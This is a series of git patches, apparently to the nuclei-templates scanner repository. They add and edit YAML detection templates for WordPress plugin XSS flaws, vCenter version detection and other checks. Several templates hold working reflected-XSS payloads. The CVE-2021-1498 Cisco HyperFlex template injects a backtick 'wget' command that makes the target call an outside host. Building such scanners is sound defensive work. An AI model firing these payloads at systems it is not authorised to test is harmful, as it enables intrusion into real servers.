'{{BaseURL}}/wp-admin/admin.php?page=ultimate-maps-supsystic&tab="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//' + - '{{BaseURL}}/wp-admin/admin.php?page=ultimate-maps-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - 'alert(/XSS/)/' + - '' condition: and - type: status From c0912f3a0809b1a64904bf195ea1ef6f91a01c75 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 29 Sep 2021 00:21:25 +0530 Subject: [PATCH 2576/4083] Update CVE-2021-24226.yaml --- cves/2021/CVE-2021-24226.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-24226.yaml b/cves/2021/CVE-2021-24226.yaml index 071b117a42..2548bcc24e 100644 --- a/cves/2021/CVE-2021-24226.yaml +++ b/cves/2021/CVE-2021-24226.yaml @@ -13,7 +13,7 @@ info: cvss-score: 7.50 cve-id: CVE-2021-24226 cwe-id: CWE-200 - tags: wordpress,cves,cve2021,wp-plugin + tags: wordpress,cve,cve2021,wp-plugin requests: - method: GET From 58e6ee07a94826c8547751bf588809bbe967db0a Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 29 Sep 2021 00:22:52 +0530 Subject: [PATCH 2577/4083] Update CVE-2021-24275.yaml --- cves/2021/CVE-2021-24275.yaml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/cves/2021/CVE-2021-24275.yaml b/cves/2021/CVE-2021-24275.yaml index 5590f033eb..625ef74197 100644 --- a/cves/2021/CVE-2021-24275.yaml +++ b/cves/2021/CVE-2021-24275.yaml @@ -4,27 +4,27 @@ info: name: Popup by Supsystic < 1.10.5 - Reflected Cross-Site scripting (XSS) author: dhiyaneshDK severity: medium + description: The Popup by Supsystic WordPress plugin before 1.10.5 did not sanitise the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue. reference: - https://wpscan.com/vulnerability/efdc76e0-c14a-4baf-af70-9d381107308f - tags: wordpress,cves,cve2021 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24275 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.10 cve-id: CVE-2021-24275 cwe-id: CWE-79 - description: "The Popup by Supsystic WordPress plugin before 1.10.5 did not sanitise the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue" + tags: wordpress,cve,cve2021,wp-plugin requests: - method: GET path: - - '{{BaseURL}}/wp-admin/admin.php?page=popup-wp-supsystic&tab="onmouseover=alert(/XSS/)//' - - '{{BaseURL}}/wp-admin/admin.php?page=popup-wp-supsystic&tab="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//' + - '{{BaseURL}}/wp-admin/admin.php?page=popup-wp-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - 'alert(/XSS/)/' + - '' condition: and - type: status From aac4c689b5b6ca091348016cafda986001c060c1 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 29 Sep 2021 00:24:48 +0530 Subject: [PATCH 2578/4083] Update CVE-2021-24276.yaml --- cves/2021/CVE-2021-24276.yaml | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/cves/2021/CVE-2021-24276.yaml b/cves/2021/CVE-2021-24276.yaml index c79a5f9b01..0e7cc9ec1f 100644 --- a/cves/2021/CVE-2021-24276.yaml +++ b/cves/2021/CVE-2021-24276.yaml @@ -4,28 +4,28 @@ info: name: Contact Form by Supsystic < 1.7.15 - Reflected Cross-Site scripting (XSS) author: dhiyaneshDK severity: medium + description: The Contact Form by Supsystic WordPress plugin before 1.7.15 did not sanitise the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue reference: - https://wpscan.com/vulnerability/1301123c-5e63-432a-ab90-3221ca532d9c - tags: wordpress,cves,cve2021 + - https://nvd.nist.gov/vuln/detail/CVE-2021-24276 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.10 cve-id: CVE-2021-24276 cwe-id: CWE-79 - description: "The Contact Form by Supsystic WordPress plugin before 1.7.15 did not sanitise the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue" + tags: wordpress,cve,cve2021,wp-plugin requests: - method: GET path: - - '{{BaseURL}}/wp-admin/admin.php?page=contact-form-supsystic&tab="onmouseover=alert(/XSS/)//' - - '{{BaseURL}}/wp-admin/admin.php?page=contact-form-supsystic&tab="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//' + - '{{BaseURL}}/wp-admin/admin.php?page=contact-form-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word words: - - 'alert(/XSS/)/' - condition: and + - '' + part: body - type: status status: From 5bfb54e757e5ba1f2707c9ced4c55d60464d4a41 Mon Sep 17 00:00:00 2001 From: eric-louhi Date: Tue, 28 Sep 2021 16:02:26 -0400 Subject: [PATCH 2579/4083] Added vCenter version detection template --- technologies/vcenter-version-detect.yaml | 103 +++++++++++++++++++++++ 1 file changed, 103 insertions(+) create mode 100644 technologies/vcenter-version-detect.yaml diff --git a/technologies/vcenter-version-detect.yaml b/technologies/vcenter-version-detect.yaml new file mode 100644 index 0000000000..45bb85b039 --- /dev/null +++ b/technologies/vcenter-version-detect.yaml @@ -0,0 +1,103 @@ +id: vcenter-version-detect + +info: + name: vcenter-version-detect + author: elouhi + severity: info + description: Sends a POST request containing a SOAP payload to a vCenter server to obtain version information + reference: + - https://www.pwndefend.com/2021/09/23/exposed-vmware-vcenter-servers-around-the-world-cve-2021-22005/ + tags: tech,vcenter,vmware +requests: + - raw: + - | + POST /sdk/ HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 + Accept-Encoding: gzip, deflate + Accept-Language: en-US,en;q=0.9 + Connection: close + + + + + 00000001-00000001 + + + + <_this xsi:type="ManagedObjectReference" type="ServiceInstance">ServiceInstance + + + + + matchers: + - type: status + status: + - 200 + + extractors: + - type: regex + name: name + part: body + group: 1 + regex: + - "(.*?)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(.*?)" + + - type: regex + name: build + part: body + group: 1 + regex: + - "(.*?)" + + - type: regex + name: localeVersion + part: body + group: 1 + regex: + - "(.*?)" + + + - type: regex + name: localeBuild + part: body + group: 1 + regex: + - "(.*?)" + + + - type: regex + name: osType + part: body + group: 1 + regex: + - "(.*?)" + + - type: regex + name: productLineId + part: body + group: 1 + regex: + - "(.*?)" + + - type: regex + name: apiType + part: body + group: 1 + regex: + - "(.*?)" + + - type: regex + name: apiVersion + part: body + group: 1 + regex: + - "(.*?)" From a62d9176bce0063ed757d05ecd4c66aac9cc6ab2 Mon Sep 17 00:00:00 2001 From: sandeep Date: Wed, 29 Sep 2021 02:40:45 +0530 Subject: [PATCH 2580/4083] severity update --- exposed-panels/cerebro-panel.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/cerebro-panel.yaml b/exposed-panels/cerebro-panel.yaml index 9e315b83e2..88c17dfd12 100644 --- a/exposed-panels/cerebro-panel.yaml +++ b/exposed-panels/cerebro-panel.yaml @@ -3,7 +3,7 @@ id: cerebro-panel info: name: Cerebro Panel author: huowuzhao,elder tao - severity: high + severity: info reference: https://github.com/lmenezes/cerebro tags: panel,cerebro From 8c8ddc5659cee5562f3cee75d5f0b064074e48af Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 29 Sep 2021 03:50:34 +0530 Subject: [PATCH 2581/4083] Create CVE-2021-39322.yaml --- cves/2021/CVE-2021-39322.yaml | 30 ++++++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 cves/2021/CVE-2021-39322.yaml diff --git a/cves/2021/CVE-2021-39322.yaml b/cves/2021/CVE-2021-39322.yaml new file mode 100644 index 0000000000..5dfedca303 --- /dev/null +++ b/cves/2021/CVE-2021-39322.yaml @@ -0,0 +1,30 @@ +id: CVE-2021-39322 + +info: + name: Easy Social Icons < 3.0.9 - Reflected Cross-Site Scripting + author: dhiyaneshDK + severity: medium + reference: + - https://wpscan.com/vulnerability/5e0bf0b6-9809-426b-b1d4-1fb653083b58 + tags: wordpress,cve,cve2021,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-admin/admin.php//?page=cnss_social_icon_page' + + matchers-condition: and + matchers: + - type: word + words: + - '' + part: body + + - type: status + status: + - 200 + + - type: word + words: + - "text/html" + part: header From 523f56721f68d8eae1443c8e91644e8c247afaf3 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 28 Sep 2021 22:21:30 +0000 Subject: [PATCH 2582/4083] Auto Generated CVE annotations [Tue Sep 28 22:21:30 UTC 2021] :robot: --- cves/2021/CVE-2021-39322.yaml | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/cves/2021/CVE-2021-39322.yaml b/cves/2021/CVE-2021-39322.yaml index 5dfedca303..ec373b8df3 100644 --- a/cves/2021/CVE-2021-39322.yaml +++ b/cves/2021/CVE-2021-39322.yaml @@ -7,6 +7,12 @@ info: reference: - https://wpscan.com/vulnerability/5e0bf0b6-9809-426b-b1d4-1fb653083b58 tags: wordpress,cve,cve2021,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-39322 + cwe-id: CWE-79 + description: "The Easy Social Icons plugin <= 3.0.8 for WordPress echoes out the raw value of `$_SERVER['PHP_SELF']` in its main file. On certain configurations including Apache+modPHP this makes it possible to use it to perform a reflected Cross-Site Scripting attack by injecting malicious code in the request path." requests: - method: GET From 9a363effe06b40a88306c326ad7b08f41db495f6 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 29 Sep 2021 03:55:38 +0530 Subject: [PATCH 2583/4083] Create CVE-2021-24510.yaml --- cves/2021/CVE-2021-24510.yaml | 30 ++++++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 cves/2021/CVE-2021-24510.yaml diff --git a/cves/2021/CVE-2021-24510.yaml b/cves/2021/CVE-2021-24510.yaml new file mode 100644 index 0000000000..127a80096d --- /dev/null +++ b/cves/2021/CVE-2021-24510.yaml @@ -0,0 +1,30 @@ +id: CVE-2021-24510 + +info: + name: MF Gig Calendar <= 1.1 - Reflected Cross-Site Scripting (XSS) + author: dhiyaneshDK + severity: medium + reference: + - https://wpscan.com/vulnerability/715721b0-13a1-413a-864d-2380f38ecd39 + tags: wordpress,cve,cve2021,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-admin/admin.php?page=mf_gig_calendar&action=edit&id="><"' + + matchers-condition: and + matchers: + - type: word + words: + - ' Date: Tue, 28 Sep 2021 22:26:43 +0000 Subject: [PATCH 2584/4083] Auto Generated CVE annotations [Tue Sep 28 22:26:43 UTC 2021] :robot: --- cves/2021/CVE-2021-24510.yaml | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/cves/2021/CVE-2021-24510.yaml b/cves/2021/CVE-2021-24510.yaml index 127a80096d..20e0bb8774 100644 --- a/cves/2021/CVE-2021-24510.yaml +++ b/cves/2021/CVE-2021-24510.yaml @@ -7,6 +7,12 @@ info: reference: - https://wpscan.com/vulnerability/715721b0-13a1-413a-864d-2380f38ecd39 tags: wordpress,cve,cve2021,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-24510 + cwe-id: CWE-79 + description: "The MF Gig Calendar WordPress plugin through 1.1 does not sanitise or escape the id GET parameter before outputting back in the admin dashboard when editing an Event, leading to a reflected Cross-Site Scripting issue" requests: - method: GET From 1c27c6500c1bb8391643367fd96e86c05b0151c8 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 29 Sep 2021 03:59:44 +0530 Subject: [PATCH 2585/4083] Create CVE-2021-34643.yaml --- cves/2021/CVE-2021-34643.yaml | 30 ++++++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 cves/2021/CVE-2021-34643.yaml diff --git a/cves/2021/CVE-2021-34643.yaml b/cves/2021/CVE-2021-34643.yaml new file mode 100644 index 0000000000..496f276785 --- /dev/null +++ b/cves/2021/CVE-2021-34643.yaml @@ -0,0 +1,30 @@ +id: CVE-2021-34643 + +info: + name: Skaut bazar < 1.3.3 - Reflected Cross-Site Scripting + author: dhiyaneshDK + severity: medium + reference: + - https://wpscan.com/vulnerability/c1b41276-b8fb-4a5c-bede-84ea62663b7a + tags: wordpress,cve,cve2021,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-admin/options-general.php/">/?page=skatubazar_option' + + matchers-condition: and + matchers: + - type: word + words: + - '' + part: body + + - type: status + status: + - 200 + + - type: word + words: + - "text/html" + part: header From 699d3a72f9169952c6a1f1c1c900d0f4aa905ee2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 28 Sep 2021 22:31:33 +0000 Subject: [PATCH 2586/4083] Auto Generated CVE annotations [Tue Sep 28 22:31:33 UTC 2021] :robot: --- cves/2021/CVE-2021-34643.yaml | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/cves/2021/CVE-2021-34643.yaml b/cves/2021/CVE-2021-34643.yaml index 496f276785..aa2ccb205f 100644 --- a/cves/2021/CVE-2021-34643.yaml +++ b/cves/2021/CVE-2021-34643.yaml @@ -7,6 +7,12 @@ info: reference: - https://wpscan.com/vulnerability/c1b41276-b8fb-4a5c-bede-84ea62663b7a tags: wordpress,cve,cve2021,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-34643 + cwe-id: CWE-79 + description: "The Skaut bazar WordPress plugin is vulnerable to Reflected Cross-Site Scripting due to the use of $_SERVER['PHP_SELF'] in the ~/skaut-bazar.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 1.3.2." requests: - method: GET From a64419f576ca3d6e798547dcc43590f1d6618bc4 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 29 Sep 2021 04:03:06 +0530 Subject: [PATCH 2587/4083] Create CVE-2021-34640.yaml --- cves/2021/CVE-2021-34640.yaml | 30 ++++++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 cves/2021/CVE-2021-34640.yaml diff --git a/cves/2021/CVE-2021-34640.yaml b/cves/2021/CVE-2021-34640.yaml new file mode 100644 index 0000000000..731528b4d3 --- /dev/null +++ b/cves/2021/CVE-2021-34640.yaml @@ -0,0 +1,30 @@ +id: CVE-2021-34640 + +info: + name: Securimage-WP-Fixed <= 3.5.4 - Reflected Cross-Site Scripting (XSS) + author: dhiyaneshDK + severity: medium + reference: + - https://wpscan.com/vulnerability/22017067-8675-4884-b976-d7f5a71279d2 + tags: wordpress,cve,cve2021,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-admin/options-general.php/">/script%3E?page=securimage-wp-options%2F' + + matchers-condition: and + matchers: + - type: word + words: + - '' + part: body + + - type: status + status: + - 200 + + - type: word + words: + - "text/html" + part: header From 631580be25c0c23c5c2703bcad3271e7e97e54f5 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 28 Sep 2021 22:34:10 +0000 Subject: [PATCH 2588/4083] Auto Generated CVE annotations [Tue Sep 28 22:34:10 UTC 2021] :robot: --- cves/2021/CVE-2021-34640.yaml | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/cves/2021/CVE-2021-34640.yaml b/cves/2021/CVE-2021-34640.yaml index 731528b4d3..86afe87aa6 100644 --- a/cves/2021/CVE-2021-34640.yaml +++ b/cves/2021/CVE-2021-34640.yaml @@ -7,6 +7,12 @@ info: reference: - https://wpscan.com/vulnerability/22017067-8675-4884-b976-d7f5a71279d2 tags: wordpress,cve,cve2021,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-34640 + cwe-id: CWE-79 + description: "The Securimage-WP-Fixed WordPress plugin is vulnerable to Reflected Cross-Site Scripting due to the use of $_SERVER['PHP_SELF'] in the ~/securimage-wp.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 3.5.4." requests: - method: GET From ecc9f6935aeedde1631975f8bb758e512b56cc1c Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 29 Sep 2021 04:05:15 +0530 Subject: [PATCH 2589/4083] Create CVE-2021-20792.yaml --- cves/2021/CVE-2021-20792.yaml | 30 ++++++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 cves/2021/CVE-2021-20792.yaml diff --git a/cves/2021/CVE-2021-20792.yaml b/cves/2021/CVE-2021-20792.yaml new file mode 100644 index 0000000000..4407ed7b47 --- /dev/null +++ b/cves/2021/CVE-2021-20792.yaml @@ -0,0 +1,30 @@ +id: CVE-2021-20792 + +info: + name: Quiz And Survey Master < 7.1.14 - Reflected Cross-Site Scripting + author: dhiyaneshDK + severity: medium + reference: + - https://wpscan.com/vulnerability/4deb3464-00ed-483b-8d91-f9dffe2d57cf + tags: wordpress,cve,cve2021,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-admin/admin.php?page=mlw_quiz_list&s=">&paged=">' + + matchers-condition: and + matchers: + - type: word + words: + - '' + part: body + + - type: status + status: + - 200 + + - type: word + words: + - "text/html" + part: header From 6aa9d3e7ad1befa42dc8509070b3eab65022417c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 28 Sep 2021 22:36:36 +0000 Subject: [PATCH 2590/4083] Auto Generated CVE annotations [Tue Sep 28 22:36:36 UTC 2021] :robot: --- cves/2021/CVE-2021-20792.yaml | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/cves/2021/CVE-2021-20792.yaml b/cves/2021/CVE-2021-20792.yaml index 4407ed7b47..2ac7c4927e 100644 --- a/cves/2021/CVE-2021-20792.yaml +++ b/cves/2021/CVE-2021-20792.yaml @@ -7,6 +7,12 @@ info: reference: - https://wpscan.com/vulnerability/4deb3464-00ed-483b-8d91-f9dffe2d57cf tags: wordpress,cve,cve2021,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-20792 + cwe-id: CWE-79 + description: "Cross-site scripting vulnerability in Quiz And Survey Master versions prior to 7.1.14 allows a remote attacker to inject arbitrary script via unspecified vectors." requests: - method: GET From 60117015073fd117abb3969003fbe607494f13c9 Mon Sep 17 00:00:00 2001 From: TheConciergeDev <65483817+TheConciergeDev@users.noreply.github.com> Date: Wed, 29 Sep 2021 11:18:09 +0200 Subject: [PATCH 2591/4083] renamed file the second dash was a unicode value -> "\u2013" instead --- cves/2018/{CVE-2018–9845.yaml => CVE-2018-9845.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename cves/2018/{CVE-2018–9845.yaml => CVE-2018-9845.yaml} (100%) diff --git a/cves/2018/CVE-2018–9845.yaml b/cves/2018/CVE-2018-9845.yaml similarity index 100% rename from cves/2018/CVE-2018–9845.yaml rename to cves/2018/CVE-2018-9845.yaml From cf6e0a1c61a9771791d8488a85930986484f0491 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 29 Sep 2021 16:33:26 +0530 Subject: [PATCH 2592/4083] Update tidb-unauth.yaml --- network/tidb-unauth.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/network/tidb-unauth.yaml b/network/tidb-unauth.yaml index 8bdf9d9601..ec0dc15c58 100644 --- a/network/tidb-unauth.yaml +++ b/network/tidb-unauth.yaml @@ -4,6 +4,8 @@ info: name: Unauth TiDB Disclosure author: lu4nx severity: high + metadata: + zoomeye-dork: tidb +port:"4000" tags: network,tidb network: From 3b88f47042949b3cff3412fc1860876bd20204ee Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 29 Sep 2021 16:36:51 +0530 Subject: [PATCH 2593/4083] Update and rename default-ibm-http-server.yaml to ibm-http-server.yaml --- ...fault-ibm-http-server.yaml => ibm-http-server.yaml} | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) rename technologies/{default-ibm-http-server.yaml => ibm-http-server.yaml} (70%) diff --git a/technologies/default-ibm-http-server.yaml b/technologies/ibm-http-server.yaml similarity index 70% rename from technologies/default-ibm-http-server.yaml rename to technologies/ibm-http-server.yaml index 8961433dbc..6055f409b3 100644 --- a/technologies/default-ibm-http-server.yaml +++ b/technologies/ibm-http-server.yaml @@ -1,8 +1,8 @@ -id: default-ibm-http-server +id: ibm-http-server info: name: Default IBM HTTP Server - author: dhiyaneshDK + author: dhiyaneshDK,pussycat0x severity: info reference: https://www.shodan.io/search?query=http.title%3A%22IBM-HTTP-Server%22 tags: tech,ibm @@ -21,3 +21,9 @@ requests: - type: status status: - 200 + + extractors: + - type: regex + part: body + regex: + - "IBM HTTP Server ([0-9.]+)" From 1858d54cd88c7d9b0517fdc570fe0f2e54f2f2a8 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 29 Sep 2021 17:07:01 +0530 Subject: [PATCH 2594/4083] Update ibm-http-server.yaml --- technologies/ibm-http-server.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/technologies/ibm-http-server.yaml b/technologies/ibm-http-server.yaml index 6055f409b3..520d40af00 100644 --- a/technologies/ibm-http-server.yaml +++ b/technologies/ibm-http-server.yaml @@ -26,4 +26,4 @@ requests: - type: regex part: body regex: - - "IBM HTTP Server ([0-9.]+)" + - "IBM HTTP Server ([0-9.]+)" From d4690b58499a157a8b5c8120455e102e25f24b54 Mon Sep 17 00:00:00 2001 From: sandeep Date: Wed, 29 Sep 2021 18:14:28 +0530 Subject: [PATCH 2595/4083] misc update --- dns/azure-takeover-detection.yaml | 10 +++------- 1 file changed, 3 insertions(+), 7 deletions(-) diff --git a/dns/azure-takeover-detection.yaml b/dns/azure-takeover-detection.yaml index 68d9a0a9eb..e6de245138 100644 --- a/dns/azure-takeover-detection.yaml +++ b/dns/azure-takeover-detection.yaml @@ -4,13 +4,8 @@ info: name: Azure takeover detection author: pdteam severity: high - tags: dns,takeover - reference: - - https://godiego.tech/posts/STO/ # kudos to @secfaults for sharing process details. - -# Update the list with more CNAMEs related to Azure -# You need to claim the CNAME in Azure portal (https://portal.azure.com) to confirm the takeover. -# Do not report this without claiming the CNAME. + tags: dns,takeover,azure + reference: https://godiego.co/posts/STO/ dns: - name: "{{FQDN}}" @@ -40,6 +35,7 @@ dns: - "search.windows.net" - "servicebus.windows.net" - "visualstudio.com" + - type: word words: - "NXDOMAIN" From c86d5e518ddabfc3de1f4220fefeba12eebdbf56 Mon Sep 17 00:00:00 2001 From: eric-louhi Date: Wed, 29 Sep 2021 09:26:43 -0400 Subject: [PATCH 2596/4083] Added an additional matcher for vcenter-version-detect.yaml --- technologies/vcenter-version-detect.yaml | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/technologies/vcenter-version-detect.yaml b/technologies/vcenter-version-detect.yaml index 45bb85b039..29b9609e34 100644 --- a/technologies/vcenter-version-detect.yaml +++ b/technologies/vcenter-version-detect.yaml @@ -31,11 +31,17 @@ requests: + matchers-condition: and matchers: - type: status status: - 200 + - type: word + part: body + words: + - ha-folder-root + extractors: - type: regex name: name From 5af657ad03463d3d2ef65a3c82d6211172e09e0c Mon Sep 17 00:00:00 2001 From: eric-louhi Date: Wed, 29 Sep 2021 09:32:51 -0400 Subject: [PATCH 2597/4083] Renamed yaml --- ...center-version-detect.yaml => vmware-version-detect.yaml} | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) rename technologies/{vcenter-version-detect.yaml => vmware-version-detect.yaml} (96%) diff --git a/technologies/vcenter-version-detect.yaml b/technologies/vmware-version-detect.yaml similarity index 96% rename from technologies/vcenter-version-detect.yaml rename to technologies/vmware-version-detect.yaml index 29b9609e34..eccf5ef799 100644 --- a/technologies/vcenter-version-detect.yaml +++ b/technologies/vmware-version-detect.yaml @@ -1,12 +1,13 @@ -id: vcenter-version-detect +id: vmware-version-detect info: - name: vcenter-version-detect + name: vmware-version-detect author: elouhi severity: info description: Sends a POST request containing a SOAP payload to a vCenter server to obtain version information reference: - https://www.pwndefend.com/2021/09/23/exposed-vmware-vcenter-servers-around-the-world-cve-2021-22005/ + - https://svn.nmap.org/nmap/scripts/vmware-version.nse tags: tech,vcenter,vmware requests: - raw: From 6b5d52084dfe8b32b9e4da3f4c4a389d832286b8 Mon Sep 17 00:00:00 2001 From: sullo Date: Wed, 29 Sep 2021 10:35:52 -0400 Subject: [PATCH 2598/4083] Update cvss/severity for CVE-2020-29453 --- cves/2020/CVE-2020-29453.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/cves/2020/CVE-2020-29453.yaml b/cves/2020/CVE-2020-29453.yaml index 447eb86dbf..e097bb73ef 100644 --- a/cves/2020/CVE-2020-29453.yaml +++ b/cves/2020/CVE-2020-29453.yaml @@ -3,13 +3,13 @@ id: CVE-2020-29453 info: name: Pre-Auth Limited Arbitrary File Read in Jira Server author: dwisiswant0 - severity: medium + severity: high description: The CachingResourceDownloadRewriteRule class in Jira Server and Jira Data Center allowed unauthenticated remote attackers to read arbitrary files within WEB-INF and META-INF directories via an incorrect path access check. reference: https://jira.atlassian.com/browse/JRASERVER-72014 tags: cve,cve2020,atlassian,jira,lfi classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.30 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 cve-id: CVE-2020-29453 cwe-id: CWE-22 @@ -28,4 +28,4 @@ requests: - type: word words: - 'com.atlassian.jira' - part: body \ No newline at end of file + part: body From 715c8de5c031831f94e6079a2145cc95b92288cc Mon Sep 17 00:00:00 2001 From: sullo Date: Wed, 29 Sep 2021 13:05:43 -0400 Subject: [PATCH 2599/4083] Changed CVE-2021-1497 to CVE-2021-1498 per original advisory. Added ref to original advisory. --- cves/2021/CVE-2021-1498.yaml | 42 ++++++++++++++++++++++++++++++++++++ 1 file changed, 42 insertions(+) create mode 100644 cves/2021/CVE-2021-1498.yaml diff --git a/cves/2021/CVE-2021-1498.yaml b/cves/2021/CVE-2021-1498.yaml new file mode 100644 index 0000000000..f10fa4fa4c --- /dev/null +++ b/cves/2021/CVE-2021-1498.yaml @@ -0,0 +1,42 @@ +id: CVE-2021-1498 + +info: + name: Cisco HyperFlex HX Data Platform RCE + description: Multiple vulnerabilities in the web-based management interface of Cisco HyperFlex HX could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. + author: gy741 + severity: critical + reference: + - https://swarm.ptsecurity.com/cisco-hyperflex-how-we-got-rce-through-login-form-and-other-findings/ + - https://nvd.nist.gov/vuln/detail/CVE-2021-1498 + - https://packetstormsecurity.com/files/162976/Cisco-HyperFlex-HX-Data-Platform-Command-Execution.html + - https://twitter.com/Unit42_Intel/status/1402655493735206915 + - https://twitter.com/ptswarm/status/1390300625129201664 + - https://www.thezdi.com/blog/2021/6/23/cve-2021-1497-cisco-hyperflex-hx-auth-handling-remote-command-execution + - https://github.com/EdgeSecurityTeam/Vulnerability/blob/c0af411de9adb82826303c5b05a0d766fb553f28/Cisco%20HyperFlex%20HX%20%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5%EF%BC%88CVE-2021-1497-CVE-2021-1498%EF%BC%89.md + tags: cve,cve2021,cisco,rce,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-1498 + cwe-id: CWE-78 + +requests: + - raw: + - | + POST /storfs-asup HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: application/x-www-form-urlencoded + + action=&token=`wget http://{{interactsh-url}}`&mode=`wget http://{{interactsh-url}}` + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" From 7de80aa554370f6f4b7bbeccfcf22a03940863cf Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 30 Sep 2021 00:05:19 +0530 Subject: [PATCH 2600/4083] Delete text.txt --- text.txt | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 text.txt diff --git a/text.txt b/text.txt deleted file mode 100644 index e69de29bb2..0000000000 From 04fcd5b5e716ca4c7bb6351a554769ef834a9b3c Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 30 Sep 2021 00:19:32 +0530 Subject: [PATCH 2601/4083] Update vmware-version-detect.yaml --- technologies/vmware-version-detect.yaml | 64 +++---------------------- 1 file changed, 6 insertions(+), 58 deletions(-) diff --git a/technologies/vmware-version-detect.yaml 